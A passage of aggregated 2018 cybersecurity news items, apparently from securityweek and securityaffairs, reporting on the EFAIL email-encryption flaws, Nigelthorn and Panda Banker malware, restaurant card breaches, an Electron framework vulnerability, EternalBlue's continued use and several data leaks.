The security threat is not hypothetical. While there have already been severaal highly-publicized incidents (such as the Ukraine power outages in December 2015, and the U.S. water utility incident in March 2016) the majority of respondents have also experienced a breach. Fifty-six percent of organizations using SCADA / ICS reported a breach in the past year, and only 11% indicated they have never been breached.

SCADA / ICS breaches can have serious consequences. "Sixty-three percent of organizations say the safety of their employees was highly or critically impacted by a SCADA / ICS security breach," notes the report. "Another 58% report major impacts to their organization’s financial stability, and 63% note a serious drag on their ability to operate at a sufficient level."

Solutions to the growing SCADA / ICS risk exist, but require a new approach beyond the traditional IT security approach. IT and OT teams speak different languages for security, comments Newton. Existing OT systems may be running on an obsolete operating system on hardware that is ten or more years old. "But that may be because it only has one job," he explains: "for example, monitoring a thermostat and then throwing a switch when it reaches a critical temperature. That doesn’t require the latest technology, and if it is doing the job it was designed to do, then there is no reason to change it. But because so many of these systems run on proprietary software and use delicate instrumentation, even something as benign as scanning a device for malware can cause it to malfunction."

Solutions do exist, but must be chosen with care. "When considering a security vendor for their SCADA / ICS environments," suggests Newton, "the ability to meet compliance standards and provide end-to-end solutions, along with a reputation for reliability are the most important attributes [the respondents] look for. These organizations are looking for solutions from a variety of vendors, from systems integrators to security manufacturers."


Hackers Divert Funds From Mexico Banks, Amount Unclear: Official
14.5.2018 securityweek Hacking 

Hackers have stolen an unknown amount of money from banks in Mexico in a series of cyber attacks on the country's interbank payments system, an official said Monday.

At least five attacks on the Mexican central bank's Interbank Electronic Payments System (SPEI) were carried out in April and May, said Lorenza Martinez, director general of the corporate payments and services system at the central bank.

"Some transactions were introduced that were not recognized by the issuing bank," she told Radio Centro.

"In some cases these transfers made it through to the destination bank and were withdrawn in cash."

She declined to reveal which banks were targeted.

Some Mexican media outlets have put the amount stolen at 400 million pesos ($20.4 million), but Martinez denied those reports.

"The amount is currently being analyzed. Some of the transfers were stopped, and the funds are currently being returned," she said.

She said the money stolen belonged to the banks themselves and that clients' funds were never affected.

The interbank payments system allows banks to make real-time transfers to each other.

They connect via their own computer systems or an external provider -- the point where the attacks appear to have taken place, Martinez said.

After the attacks were detected, banks switched to a slower but more secure method.

No new attacks have been registered since.


Researchers disclosed details of EFAIL attacks on in PGP and S/MIME tools. Experts believe claims are overblown
14.5.2018 securityaffairs 
Attack

EFAIL attacks – Researchers found critical vulnerabilities in PGP and S/MIME Tools, immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.
A few hours ago, I reported the news that security researchers from three universities in Germany and Belgium have found critical vulnerabilities in PGP and S/MIME Tools that could be exploited by attackers to read emails encrypted with OpenPGP and S/MIME.

Pretty Good Privacy is the open source end-to-end encryption standard used to encrypt emails, while S/MIME, Secure/Multipurpose Internet Mail Extensions, is an asymmetric cryptography-based technology that allows users to send digitally signed and encrypted emails.

The existence of the vulnerabilities was also confirmed by the researchers at the Electronic Frontier Foundation (EFF) that recommended users to uninstall Pretty Good Privacy and S/MIME applications until the issued are fixed.

The experts initially planned on disclosing details on Tuesday morning, but they later decided to publicly share their findings due to wrong information circulating online.

The experts disclosed two variant of the attack dubbed EFAIL, in both scenarios hackers need to be in a position of intercepting encrypted emails, for example hacking the target email account or conducting a man-in-the-middle (MitM) attack.

“The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs.” reads the blog post published by the researchers.

“To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.”

The attacker manipulates the ciphertext in the protected emails and sends a modified message containing custom HTML code to the original receiver or sender.

EFAIL attack

The first attack technique, dubbed direct exfiltration attack, exploits vulnerabilities in the Apple Mail (for iOS and macOS) and Mozilla Thunderbird email clients. The attacker sends the targeted user a specially crafted multipart email with three HTML body parts. When the victim’s client will open and decrypt the email, the attacker’s code causes the application to send the text to a server controlled by the attacker.

The direct exfiltration technique could be used against both PGP and S/MIME.

The second technique, named a CBC/CFB gadget attack, exploits vulnerabilities in the OpenPGP (CVE-2017-17688) and S/MIME (CVE-2017-17689). In the attack scenario, the victim needs to be in possession of their private key, if the private key has been lost the techniques cannot be used.

“He then sends the manipulated email to one of the original receivers, or to the original sender. He may hide this by choosing new FROM, DATE and SUBJECT fields, and he may hide the manipulated ciphertext by hiding it within an invisible iFrame. Thus the attack mail the victim receives looks unsuspicious” reads the research paper published by the experts.

“Once he opens the email in his client, the manipulated ciphertext will be decrypted – first the private key of the victim is used to decrypt the session key s, and then this session key is used to decrypt the manipulated ciphertext c. The decrypted plaintext now contains, due to the manipulations, an exfiltration channel (e.g., an HTML hyperlink) that will send the decrypted plaintext as a whole or in parts to the attacker,” researchers wrote in their paper on EFAIL.

The CBC/CFB gadget attack is effective against PGP, researchers observed a success rate of 33%.

Test results show the EFAIL attack work against 25 of 35 tested S/MIME email clients and 10 of 28 tested OpenPGP clients.

“Our analysis shows that EFAIL plaintext exfiltration channels exist for 25 of the 35 tested S/MIME email clients and 10 of the 28 tested OpenPGP email clients.” states the blog post.

“While it is necessary to change the OpenPGP and S/MIME standards to reliably fix these vulnerabilities, Apple Mail, iOS Mail and Mozilla Thunderbird had even more severe implementation flaws allowing direct exfiltration of the plaintext that is technically very easy to execute.”

Many security experts downplayed the importance of the EFAIL attack techniques explaining that the attacks work only against buggy email clients.

Robert J. Hansen
@robertjhansen
6h
Replying to @robertjhansen
GnuPG, and/or an email plugin which didn't handle the warning correctly.

We made three statements about the Efail attack at the beginning. We're
going to repeat them here and give a little explanation. Now that we've
explained the situation, we're confident you'll concur in 12/

Robert J. Hansen
@robertjhansen
our judgment.

1. This paper is misnamed. It's not an attack on OpenPGP. It's an
attack on broken email clients that ignore GnuPG's warnings and do silly
things after being warned. 13/

2:38 PM - May 14, 2018
32
20 people are talking about this
Twitter Ads info and privacy

Robert J. Hansen
@robertjhansen
6h
Replying to @robertjhansen
2. This attack targets buggy email clients. Correct use of the MDC
completely prevents this attack. GnuPG has had MDC support since the
summer of 2000. 14/

Robert J. Hansen
@robertjhansen
3. The authors made a list of buggy email clients. It's worth looking
over their list of email clients (found at the very end) to see if yours
is vulnerable. But be careful, because it may not be accurate -- for
example, Mailpile says they're not vulnerable, but the paper 15/

2:38 PM - May 14, 2018
14
See Robert J. Hansen's other Tweets
Twitter Ads info and privacy

ProtonMail

@ProtonMail
While we think that stories claiming "PGP is vulnerable" are inaccurate (since the issue was reported in 2001 and is a client side problem), we do take the Efail bug seriously. The researchers have said ProtonMail is not impacted. We are performing independent confirmation also.

3:36 PM - May 14, 2018
302
123 people are talking about this
Twitter Ads info and privacy

ProtonMail

@ProtonMail
ProtonMail is safe against the efail PGP vulnerability. The real vulnerability is implementation errors in various PGP clients. PGP (and OpenPGP) is fine. Any service that uses our @openpgpjs library is also safe as long the default settings aren't changed.

1:55 PM - May 14, 2018
623
462 people are talking about this
Twitter Ads info and privacy
EFAIL attacks can be mitigated by not using HTML for incoming emails, patches released by email client developers could prevent the attacks.


Nigelthorn malware infected over 100,000 systems abusing Chrome extensions
14.5.2018 securityaffairs 
Virus

The Nigelthorn malware has already infected over 100,000 systems in 100 countries by abusing a Google Chrome extension called Nigelify.
A new strain of malware, dubbed Nigelthorn malware because it abuses a Google Chrome extension called Nigelify, has already infected over 100,000 systems in 100 countries, most of them in the Philippines, Venezuela, and Ecuador (Over 75%).

The new malware family is capable of credential theft, cryptomining, click fraud, and other malicious activities.

According to the experts, the threat actor behind this campaign has been active since at least March 2018.

The Nigelthorn malware is spreading through links on Facebook, victims are redirected to a fake YouTube page that asks them to download and install a Chrome extension to play the video. Once the victims accepted the installation, the malicious extension will be added to their browser.

“Radware has dubbed the malware “Nigelthorn” since the original Nigelify application replaces pictures to “Nigel Thornberry” and is responsible for a large portion of the observed infections.” reads the analysis published by Radware.

“The malware redirects victims to a fake YouTube page and asks the user to install a Chrome extension to play the video.”


The malware was specifically developed to target both Windows and Linux machines using the Chrome browser.

When a victim clicks on “Add Extension” is redirected to a Bitly URL from which they will be redirected to Facebook in the attempt to provide the credentials for his account.

In order to bypass Google Application validation tools, the threat actors used copycat versions of legitimate extensions and injected a short, obfuscated malicious script into them.

“To date, Radware’s research group has observed seven of these malicious extensions, of which it appears four have been identified and blocked by Google’s security algorithms. Nigelify and PwnerLike remain active,” reads the analysis.

After the malicious extension is installed, a JavaScript is executed to start the attack by downloading the malware configuration from the command and control (C&C) server, after which a set of requests is deployed.

The Nigelthorn malware is able to steal Facebook login credentials and Instagram cookies. The malware also redirects users to a Facebook API to generate an access token that is then sent to the Command and Control servers.

The malware propagated by using the stolen credentials, it sends the malicious link to the victim’s network either via messages in Facebook Messenger, or via a new post that includes tags for up to 50 contacts.

The Nigelthorn malware also downloads a cryptomining tool to the victim’s computer.

“The attackers are using a publicly available browser-mining tool to get the infected machines to start mining cryptocurrencies.” states Radware. “The JavaScript code is downloaded from external sites that the group controls and contains the mining pool. Radware observed that in the last several days the group was trying to mine three different coins (Monero, Bytecoin and Electroneum) that are all based on the “CryptoNight” algorithm that allows mining via any CPU.”

The malicious code uses numerous techniques to gain persistence on the infected system, such as closing the extensions tab if the user attempts to access it, or downloading URI Regex from the C&C and blocking users from accessing Facebook and Chrome cleanup tools or from making edits, deleting posts, and posting comments.

Experts also described a YouTube fraud, the YouTube plugin is downloaded and executed, after which the malware attempts to access the URI “/php3/youtube.php” on the C&C to receive commands to watch, like, or comment on a video, or to subscribe to the page. These actions are likely an attempt to receive payments from YouTube.

“As this malware spreads, the group will continue to try to identify new ways to utilize the stolen assets. Such groups continuously create new malware and mutations to bypass security controls. Radware recommends individuals and organizations update their current password and only download applications from trusted sources,” concludes Radware.


Chili’s restaurant chain is the last victim of a Payment Card Breach
14.5.2018 securityaffairs  Incindent

Brinker International warns customers who recently paid with their payment card at a Chili’s restaurant may have had their financial data stolen by crooks.
On May 11, Brinker International company, which operates more than 1,600 Chili’s and Maggiano’s restaurants across 31 countries worldwide, announced to have suffered a data breach.

“This notice is to make you aware that some Chili’s restaurants have been impacted by a data incident, which may have resulted in unauthorized access or acquisition of your payment card data, and to provide you information on steps you can take to protect yourself and minimize the possibility of misuse of your information.” reads the notice issued by Brinker.

The company issued a notice to warn people that recently used their payment cards at a Chili’s restaurant of a possible data breach, according to the initial investigation crooks infected payment systems with a malware.

Chiliâ??s restaurant

Cybercriminals siphoned payment card data from some Chili’s restaurants between March and April 2018. The malicious code was used to harvest credit and debit card numbers as well as cardholder names from PoS systems in the restaurants.

“Based on the details of the issue currently uncovered, we believe that malware was used to gather payment card information including credit or debit card numbers as well as cardholder names from our payment-related systems for in-restaurant purchases at certain Chili’s restaurants. Currently, we believe the data incident was limited to between March – April 2018; however, we continue to assess the scope of the incident.” continues the note.

“Chili’s does not collect certain personal information (such as social security number, full date of birth, or federal or state identification number) from Guests. Therefore, this personal information was not compromised.”

The company highlighted that it does not collect social security numbers, dates of birth or other personal information, it immediately activated the incident response plan and is currently working with third-party forensic experts to investigate the incident.

Brinker advised customers to monitor their bank and credit card statements for any suspicious activity. Customers can visit a web page set up by the company to receive more information on the data breach and updates on this event.

Major restaurant chains are a privileged target for cybercriminals, last year many companies suffered a data breach including Amazon’s Whole Foods Market, Arby’s, and Chipotle.


Critical Flaws in PGP and S/MIME Tools – Immediately disable tools that automatically decrypt PGP-encrypted email
14.5.2018 securityaffairs
Attack

Researchers found critical vulnerabilities in PGP and S/MIME Tools, immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.
If you are one of the users of the email encryption tools Pretty Good Privacy and S/MIME there is an important warning for you.

A group of European security expert has discovered a set of critical vulnerabilities in PGP and S/Mime encryption tools that could reveal your encrypted emails in plain text, also the ones you sent in the past.

Pretty Good Privacy is the open source end-to-end encryption standard used to encrypt emails, while S/MIME, Secure/Multipurpose Internet Mail Extensions, is an asymmetric cryptography-based technology that allows users to send digitally signed and encrypted emails.

Sebastian Schinzel, a professor of Computer Security at the Münster University of Applied Sciences, warned the Pretty Good Privacy (PGP) might actually allow Pretty Grievous P0wnage due to vulnerabilities and the worst news is that currently there are no reliable fixes.

Sebastian Schinzel
@seecurity
13h
We'll publish critical vulnerabilities in PGP/GPG and S/MIME email encryption on 2018-05-15 07:00 UTC. They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past. #efail 1/4

Sebastian Schinzel
@seecurity
There are currently no reliable fixes for the vulnerability. If you use PGP/GPG or S/MIME for very sensitive communication, you should disable it in your email client for now. Also read @EFF’s blog post on this issue: https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilities-require-you-take-action-now … #efail 2/4

8:00 AM - May 14, 2018

Attention PGP Users: New Vulnerabilities Require You To Take Action Now
A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME. EFF has been in communication with the research team, and can...

eff.org
321
483 people are talking about this
Twitter Ads info and privacy
The existence of the vulnerabilities was also confirmed by the researchers at the Electronic Frontier Foundation (EFF), the organization also recommended users to uninstall Pretty Good Privacy and S/MIME applications until the issued are fixed.

“A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME. EFF has been in communication with the research team, and can confirm that these vulnerabilities pose an immediate risk to those using these tools for email communication, including the potential exposure of the contents of past messages.” reads the blog post published by the EFF.

“Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.”

PGP and S/MIME Tools, hacking encryption

The EFF also provided links to guides on how to temporarily disable PGP plug-ins in for Thunderbird with Enigmail, Apple Mail with GPGTools, and Outlook with Gpg4win.
“Until the flaws described in the paper are more widely understood and fixed, users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email,” states the advisory.

Schnizel will disclose full details on Tuesday morning at 0700 UTC.


PANDA Banker malware used in several campaigns aimed at banks, cryptocurrency exchanges and social media
14.5.2018 securityaffairs
Virus  Cryptocurrency

Security firm F5 detailed recently discovered campaigns leveraging the Panda Banker malware to target financial institution, the largest one aimed the banks in the US.
Researchers at security firm F5 recently detected several campaigns leveraging the Panda Banker malware to target financial institution, the largest one aimed the banks in the US.

In March, security researchers at Arbor Networks discovered a threat actor targeting financial institutions in Japan using the latest variant of the Panda Banker banking malware (aka Zeus Panda, PandaBot).

Panda Banker was first spotted in 2016 by Fox-IT, it borrows code from the Zeus banking Trojan and is sold as a kit on underground forums, In November 2017, threat actors behind the Zeus Panda banking Trojan leveraged black Search Engine Optimization (SEO) to propose malicious links in the search results. Crooks were focused on financial-related keyword queries.

The main feature of the Panda Banker is the stealing of credentials and account numbers, it is able to steal money from victims by implementing “man in the browser” attack.

According to F5, the malware continues to target Japanese institutions and it is also targeting users in the United States, Canada, and Latin America.

“We analyzed four campaigns that were active between February and May of 2018. The three May campaigns are still active at the time of this writing. Two of the four campaigns are acting from the same botnet version but have different targets and different command and control (C&C) servers.” reads the analysis published by F5.

“Panda is still primarily focused on targeting global financial services, but following the worldwide cryptocurrency hype, it has expanded its targets to online cryptocurrency exchanges and brokerage services. Social media, search, email, and adult sites are also being targeted by Panda.”

Experts observed a spike in the activity associated with the malware in February when the malicious code was used to target financial services and cryptocurrency sites in Italy with screenshots rather than webinjects. With this technique, the attackers are able to spy on user interaction at cryptocurrency accounts.

“The Panda configuration we analyzed from February was marked as botnet “onore2.” This campaign leverage the same attack techniques as previously described, and it is able to keylog popular web browsers and VNC in order to hijack user interaction session and steal personal information.” states the analysis.

Panda-banker-by-industry

In May, the experts monitored three different Panda Banker campaigns each focused on different countries.

One of them, tracked by F5 as botnet “2.6.8,” had targets in 8 industries in North America, most of the targets (78%) are US financial organizations.

“This campaign is also targeting major social media platforms like Facebook and Instagram, as well as messaging apps like Skype, and entertainment platforms like Youtube. Additionally, Panda is targeting Microsoft.com, bing.com, and msn.com,” says F5.

Experts discovered that the same botnet 2.6.8 is also targeting Japanese financials as well.

Comparison of the two botnet configurations reveals that when Zeus.Panda is targeting Japan, the authors removed the Content Security Policy (CSP) headers: remove_csp – 1 : The CSP header is a security standard for preventing cross-site scripting (XSS), clickjacking and other code injection attacks that could execute malicious code from an otherwise trusted site.

This last campaign also targets Amazon, YouTube, Microsoft.com, Live.com, Yahoo.com, and Google.com, Facebook, Twitter, and a couple of two sites.

The third campaign aimed at financial institutions in Latin America, most of them in Argentina, Columbia, and Ecuador, The same campaign also targeted social media, search, email, entertainment, and tech provider as the other attacks.

“This act of simultaneous campaigns targeting several regions around the world and industries indicates these are highly active threat actors, and we expect their efforts to continue with multiple new campaigns coming out as their current efforts are discovered and taken down,” F5 concludes.


Code Execution Flaw in Electron Framework Could Affect Many Apps
14.5.2018 securityweek
Vulnerebility

GitHub’s open source development framework Electron is affected by a vulnerability that can allow remote code execution. Technical details and proof-of-concept (PoC) code were made public last week by the researcher who discovered the issue.

Electron allows developers to create cross-platform desktop applications using HTML, CSS and JavaScript. The framework has been used in the development of hundreds of applications, including Skype, GitHub Desktop, Slack, WhatsApp, Signal, Discord and WordPress.com.

Trustwave researcher Brendan Scarvell discovered earlier this year that certain applications created with Electron may allow remote code execution if they are affected by cross-site scripting (XSS) vulnerabilities and configured in a specific way.

“Electron applications are essentially web apps, which means they're susceptible to cross-site scripting attacks through failure to correctly sanitize user-supplied input. A default Electron application includes access to not only its own APIs, but also includes access to all of Node.js' built in modules. This makes XSS particularly dangerous, as an attacker's payload can allow do some nasty things such as require in the child_process module and execute system commands on the client-side,” the researcher explained in a blog post. “You can remove access to Node.js by passing nodeIntegration: false into your application's webPreferences.”

Scarvell found that if an application is affected by an XSS flaw and certain options have not been manually set in the app’s webPreferences, an attacker can re-enable nodeIntegration during runtime and execute system commands.

The vulnerability, tracked as CVE-2018-1000136, was patched by Electron developers in March with the release of versions 1.7.13, 1.8.4, and 2.0.0-beta.4. The security hole can also be mitigated by adding a piece of code provided by Electron.

The Signal messaging app and the Brave web browser are reportedly not impacted by this flaw.


Chili's Restaurants Hit by Payment Card Breach
14.5.2018 securityweek Incindent

People who recently paid with their credit or debit card at a Chili’s restaurant may have had their information stolen by cybercriminals, according to Dallas-based Brinker International.

Brinker, which operates more than 1,600 Chili’s and Maggiano’s restaurants across 31 countries, issued a notice shortly after the data breach was discovered on May 11.

While the investigation is ongoing, initial evidence suggests that a piece of malware collected payment card data from some Chili’s restaurants in March and April 2018. The malware apparently harvested credit and debit card numbers as well as cardholder names from payment systems used for in-restaurant purchases.

Brinker noted that it does not collect social security numbers, dates of birth or other personal information.

“We immediately activated our response plan upon learning of this incident,” the company stated. “We are working with third-party forensic experts to conduct an investigation to determine the details of what happened.”

Brinker believes the incident has been contained, but advised customers to keep an eye on their bank and credit card statements for any suspicious activity.The company has set up a web page where it will provide updates on this incident.

Chili’s is not the only major restaurant chain to disclose a payment card breach this year. RMH Franchise Holdings revealed in March that malware had been found on point-of-sale (PoS) systems at over 160 Applebee’s restaurants it operates as a franchise.

Several major restaurant chains disclosed payment card breaches last year, including Arby’s, Chipotle, Sonic Drive-In, and Shoney’s. Amazon's Whole Foods Marketalso informed customers that taprooms and full table-service restaurants at nearly 100 locations were hit by a breach.


ZTE Woes Loom as US-China Trade Tensions Rise
13.5.2018 securityweek BigBrothers

With a major Chinese smartphone maker on the rocks following US sanctions, the trade spat between Washington and Beijing appears to be taking a turn for the worse for tech firms in the two global economic powerhouses.

Chinese telecom giant ZTE said in the past week its major operations had "ceased" following last month's US ban on American sales of critical technology to the company, raising the possibility of its collapse.

ZTE depended on American chips and other components, and is unable to continue operating without key supplies.

US officials imposed the ban last month, saying ZTE failed to abide by an agreement to stop selling to Iran and North Korea.

While the ZTE case has a specific legal basis, the ban comes as US-China trade relations have hit a rough patch, amid an intense rivalry for supremacy in key technology fields such as artificial intelligence and 5G, the next-generation wireless systems in the works.

The US administration has barred military and government employees from using smartphones from ZTE and fellow Chinese maker Huawei.

President Donald Trump earlier this year blocked a deal that would have allowed a Singapore-based firm to acquire US chipmaker Qualcomm, claiming it would enable Huawei to set the pace the global rollout of 5G technology.

The trade troubles threaten a technology sector that is increasingly intertwined with major players in the United States and China.

"It's going to disrupt procurement, supply lines, it will affect a lot of companies in various ways," said one technology industry executive who asked to remain anonymous.

"Nobody's panicking yet but people are nervous and watching."

Accelerating independence drive

James Lewis, a technology specialist with the Center for Strategic and International Studies, said the tensions are likely to prompt China to step up efforts to disconnect from the US tech sector.

"The biggest impact will be to accelerate China's desire to have non-American sources of supply," Lewis said.

"They don't want to be held hostage" to US tech firms.

Lewis said the technology trade tensions stem from genuine concerns in Washington that critical 5G and related telecom technologies will be dominated by China-based Huawei.

"Huawei is trying to become the telecom company for the world," Lewis said. "They are the strongest across the board in 5G... This is a place where China's model of capital works better."

Lewis said that with companies like Huawei and ZTE facing obstacles in the United States, "American companies see the opening to the China market closing more rapidly than they might have thought."

In the near-term, Lewis said, Chinese firms still depend on some elements of US technology, but they are moving to become more autonomous.

Still, he said Washington has some justified national security concerns about preventing Huawei from becoming too dominant.

Increasing reliance on Chinese telecom equipment would give Beijing an edge in global surveillance and intelligence, he said.

"The equipment is always calling home," he said. "If you control the updater and the infrastructure you have an immense advantage."

Huawei has long disputed any links to the Chinese government, while noting that its infrastructure and computing products are used in 170 countries.

A statement from Huawei said its products "meet the highest standards of security, privacy and engineering in every country we operate," adding that "no government has ever asked us to compromise the security or integrity of any of our networks or devices."

Victory dance?

Matt Gold, an adjunct Fordham University law professor and former deputy assistant US trade representative, said the latest problems over ZTE are unlikely to worsen relations because "the current situation is about as bad as it can get without a complete freefall."

Gold said that while the president has authority under domestic law to impose sanctions for national security reasons, such moves may violate international trade rules and laws if the actions come in the absence of war or other emergency.

In the current climate, Gold said, US lawmakers appear inclined to impose stricter limits on Chinese investments in US tech firms as a way to stay ahead of China.

The Trump administration, according to Gold, could take a risky hard-line path of imposing new tariffs and restrictions on technology, but is more likely to seek to negotiate some concessions.

He said it is probable that "after many months of negotiations, China will give the US a series of concessions, including some things they had already agreed to and some of which were promises they had given before."

And all that, Gold said, "will be face saving for President Trump, who will declare a great victory."


Nigelthorn Malware Infects Over 100,000 Systems
13.5.2018 securityweek
Virus

A newly discovered malware family capable of credential theft, cryptomining, click fraud, and other nefarious actions has already infected over 100,000 computers, Radware reveals.

Dubbed Nigelthorn because it abuses a Google Chrome extension called Nigelify, the malware is propagating via socially-engineered links on Facebook. The group behind the campaign has been active since at least March 2018 and has already managed to infect users in 100 countries.

Victims are redirected to a fake YouTube page that asks them to install a Chrome extension to play the video. Once they accept the installation, the malicious extension is added to their browser, and the machine is enrolled in the botnet.

Impacting both Windows and Linux machines, the malware depends on Chrome, which suggests that those who do not use this browser are not at risk, the security researchers point out.

The actor behind the campaign uses the Bitly URL shortening service when redirecting victims to Facebook to trick users into revealing their login credentials. Based on statistics from Bitly and the Chrome web store, Radware determined that 75% of the infections occurred in the Philippines, Venezuela and Ecuador, with the remaining 25% distributed over 97 other countries.

In order to bypass Google’s validation checks, the malware developers created copies of legitimate extensions and injected a short, obfuscated malicious script into them, to start the malware operation.

“To date, Radware’s research group has observed seven of these malicious extensions, of which it appears four have been identified and blocked by Google’s security algorithms. Nigelify and PwnerLike remain active,” the security researchers note.

When the extension is installed, a malicious JavaScript is executed to download the initial malware configuration from the command and control (C&C) server, after which a set of requests is deployed.

The Nigelthorn malware itself is focused on stealing Facebook login credentials and Instagram cookies. It also redirects users to a Facebook API to generate an access token that is then sent to the C&C.

The stolen credentials are used for propagation, to spread the malicious link to the user’s network either via messages in Facebook Messenger, or via a new post that includes tags for up to 50 contacts. Should any of the victim’s contacts click on the link, the infection process is repeated.

The malware also downloads a cryptomining tool to the victim’s machine. A publicly available browser-mining tool is used for this, downloaded from external sites that the group controls. Over the past several days, the actor was observed attempting to mine Monero, Bytecoin and Electroneum, all of which require CPU power to mine.

Persistence is achieved through closing the extensions tab if the user attempts to access it, and through downloading URI Regex from the C&C and blocking users from accessing Facebook and Chrome cleanup tools or from making edits, deleting posts, and posting comments.

A YouTube plugin is downloaded and executed, after which the malware attempts to access the URI “/php3/youtube.php” on the C&C to receive commands to watch, like, or comment on a video, or to subscribe to the page. These actions are likely an attempt to receive payments from YouTube.

“As this malware spreads, the group will continue to try to identify new ways to utilize the stolen assets. Such groups continuously create new malware and mutations to bypass security controls. Radware recommends individuals and organizations update their current password and only download applications from trusted sources,” the researchers conclude.


Wannacry outbreak anniversary: the EternalBlue exploit even more popular now
13.5.2018 securityaffairs
Ransomware  Exploit

WannaCry ransomware outbreak anniversary – According to researchers from ESET, the popularity of EternalBlue increase significantly over the past months.
Exactly one year ago, on May 12, the WannaCry ransomware infected hundreds of thousands of computers worldwide.

The success of the malware was the use of the EternalBlue exploit that was stolen by Shadow Brokers from the arsenal of the US National Security Agency along with a large cache of tools and exploits.

The group released a 117.9 MB encrypted dump containing documents that suggest NSA hacker SWIFT system in the Middle East.

Some of the codenames for the hacking tools in the dump are OddJob, EasyBee, EternalRomance, FuzzBunch, EducatedScholar, EskimoRoll, EclipsedWing, EsteemAudit, EnglishMansDentist, MofConfig, ErraticGopher, EmphasisMine, EmeraldThread, EternalSynergy, EwokFrenzy, ZippyBeer, ExplodingCan, DoublePulsar.

The tools work against almost all versions of Windows, from Windows 2000 and XP to Windows 7 and 8, and Server 2000, 2003, 2008, 2008 R2 and 2012, except Windows 10 and Windows Server 2016.

In March 2017, a month before EternalBlue was released by Shadow Brokers, Microsoft released the MS17-010 security bulletin containing patches for SMB exploits including EternalBlue.

Just after the leakage online of ETERNALBLUE, security experts started observing a significant increase in the number of malware and hacking tools leveraging the NSA exploit to implement a self-spreading mechanism. Investigations on WannaCry revealed that at least other 3 different groups have been leveraging the NSA EternalBlue exploit.

A few weeks prior to the Wannacry ransomware outbreak, EternalBlue was used by the Adylkuzz botnet for mining activities and by the UIWIX ransomware family.

EternalBlue targets a vulnerability in Windows’ Server Message Block (SMB) on port 445, it only works against older operating system versions, mainly Windows XP and Windows 7.

EternalBlue was later used by other malware, including NotPetya and Bad Rabbit.

According to researchers from ESET, the popularity of EternalBlue increase significantly over the past months.

“And as ESET’s telemetry data shows, its popularity has been growing over the past few months and a recent spike even surpassed the greatest peaks from 2017.” reads the analysis published by ESET.

“EternalBlue had a calmer period immediately after the 2017 WannaCryptor campaign: over the following months, attempts to use the EternalBlue exploit dropped to “only” hundreds of detections daily. Since September last year, however, the use of the exploit has slowly started to gain pace again, continually growing and reaching new heights in mid-April 2018.”

EternalBlue 2017-May2018-2

Experts noticed a significant increase in the use of EternalBlue since September 2017 and reached a peak in mid-April 2018, experts believe that a Satan ransomware campaign observed in April contributed to the rapid spike.

“This exploit and all the attacks it has enabled so far highlight the importance of timely patching as well as the need for a reliable and multi-layered security solution that can block the underlying malicious tool,” continues ESET.

To mitigate the threat, disable SMBv1 and do not expose to the internet SMBv2, unfortunately currently millions of devices with SMBv1 are still exposed online most of them in the UAE, US, Russia, Taiwan, and Japan.

☠️ Nate Warfield 💀
@dk_effect
Almost a year after WannaCry and there's still over a million SMB servers without auth exposed to the world. At least it looks like "only" 66k of them are running Windows 🤦‍♂️🤦‍♂️

4:49 PM - May 11, 2018
23
See ☠️ Nate Warfield 💀's other Tweets


iVideon Russian-based video surveillance solution leaked data, hundreds of thousands of records exposed
13.5.2018 securityaffairs Incindent

Security researchers from Kromtech Security discovered a MongoDB install belonging to the Russian-based video surveillance firm Did iVideon open online.
The database included personal information for over 825,000 subscribers and partners.

Leaked records include logins, email addresses, password hashes, server names, domain names, IP addresses, sub accounts, software settings, and payment settings information (we did not see any credit card data) for both individual subscribers and partners.

iVideon is a multi-platform solution that allows subscribers to aggregate, access, view over the Internet, and record locally or to iVideon’s secure cloud storage, nearly any Internet capable CCTV camera, DVR system, baby monitor, web cam, nanny cam, or even phone, computer, and tablet cameras.

Below the tables included in the MongoDB archive:

servers.info: 12533 records
ivideon.servers: 810871 records
ivideon.partners: 132 records
ivideon.users: 825388 records
The experts reported their discovery to firm that promptly took the archive down.

According to iVideon the server was used for load testing of our auth APIs in Feb 2016, in 2017 the testing policy has been revised, so that such kind of security issues won’t happen again.

The Russian firm added that the archive included password hashes using the Bcrypt algorithm that is considered secure.

“The DB was populated with accounts & devices of several hundreds of Ivideon users marked for participation in beta-testing (Ivideon employees & external early adopters, mostly from Russia), copied multiple times to simulate some growth scenarios.” states the reply from iVideon shared by Kromtech Security.

“User info only included email, IP address and password hashes produced by a strong Bcrypt algorithm. No information related to payments, usage stats or means of getting access to user’s private data was present in the compromised DB. Partner data seen in the DB was real, containing only partner companies’ names and UI settings for their apps.”

The company was also the victim of an attack, hackers tried to blackmail it, unfortunately, attackers have left no info in the logs. Crooks demanded a .2 bitcoin ransom, the wallet they used received two payments probably made by other victims of the gang.

iVideon believes that exposed data do not pose a threat to its users or partners and downplayed the incident.

Kromtech Security applauded the company for its rapid response to the incident.

“We also definitely agree that one should not pay ransom in cases such as this, we’ve seen that it’s nothing but a scam. Their ability to quickly ascertain that only some of the deleted data was real and that aggregate traffic statistics on a router prove to them that it was not stolen will come as a relief to those who had real data in that database.” concluded Kromtech Security.

“Those users should also be pleased to know that they solved this issue in 2017 so that the data we found this year won’t be found again.”

Kromtech experts confirmed that data included in the archive appeared to be legitimate.

The researchers noticed that after they discovered and reported it to iVideon, and prior to the company taking it down, this database was compromised in the same fashion.

iVideon data leak


UK mobile operator EE left a critical code system exposed with a default password
13.5.2018 securityaffairs
Vulnerebility

The EE operator, the British largest cell network in the UK with some 30 million customers, has left a critical code system exposed online with a default password.
EE, a British mobile network giant owned by BT Group has been accused of leaving a critical code repository on an open-source tool protected by a default username and password.

The British mobile network giant EE has reportedly left a critical code repository on an open-source tool protected by default credentials.

